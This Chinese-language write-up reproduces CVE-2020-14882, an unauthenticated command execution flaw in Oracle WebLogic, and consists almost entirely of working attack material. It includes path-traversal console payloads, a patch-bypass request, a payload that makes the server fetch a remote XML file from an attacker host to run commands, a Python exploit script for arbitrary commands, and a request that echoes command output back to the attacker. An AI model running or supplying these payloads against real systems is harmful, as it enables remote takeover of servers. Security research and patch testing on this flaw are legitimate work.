CVE-2020-14882 weblogic 未授权命令执行复现
weblogic 12
/console/css/%2e%2e%2fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22);
weblogic 10
/console/css/%2e%2e%2fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.184.1:8000/spel.xml")
weblogic 12
补丁绕过
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22); HTTP/1.1 Host: 192.168.3.189:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: ADM Upgrade-Insecure-Requests: 1
weblogic 10
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.8.142/poc.xml); HTTP/1.1 Host: 192.168.3.189:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: ADM Upgrade-Insecure-Requests: 1
poc.xml文件内容
<?xml version="1.0" encoding="UTF-8" ?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" [url]http://www.springframework.org/schema/beans[/url] [url]http://www.springframework.org/schema/beans/spring-beans.xsd[/url]"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg > <list> <value>sh</value> <value>-c</value> <value><![CDATA[touch /tmp/10poc1]]></value> </list> </constructor-arg> </bean> </beans>
python
#!/usr/bin/python3 import requests import sys banner = ''' _______ ________ ___ ___ ___ ___ __ _ _ ___ ___ ___ / ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | || | / _ \ / _ \__ \ | | \ \ / /| |__ ______ ) | | | | ) | | | |______| | || || (_) | (_) | ) | | | \ \/ / | __|______/ /| | | |/ /| | | |______| |__ _> _ < > _ < / / | |____ \ / | |____ / /_| |_| / /_| |_| | | | | || (_) | (_) / /_ \_____| \/ |______| |____|\___/____|\___/ |_| |_| \___/ \___/____| ''' def exploit(): host = sys.argv[1] port = sys.argv[2] cmd = input("input cmd>") path = "/console/images/%252E%252E%252Fconsole.portal" url = "{}:{}{}".format(host, port, path) payload = "?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('{}');\");".format(cmd) headers = { "User-Agent": "Mozilla", "Host": host.split("//")[1], "Accept-Encoding": "gzip, deflate", "cmd": "tasklist", "Content-Type": "application/x-www-form-urlencoded" } try: url = url+payload print("[+]Attack Url:",url) print("Sent...") response = requests.get(url,headers=headers,timeout=10,verify=False) # print(response.text) except Exception as e: print(e) exit() def exploit2(): '''The second method of use''' print("你猜") if __name__ == '__main__': if len(sys.argv) !=3: print(banner) print("Usage: python3 exploit.py http://qq.com 7001\ntips: Your Commands are best encoded in base64") else: exploit() #exploit2()
回显操作
GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') HTTP/1.1 Host: cqq.com:7001 Connection: close cmd: whoami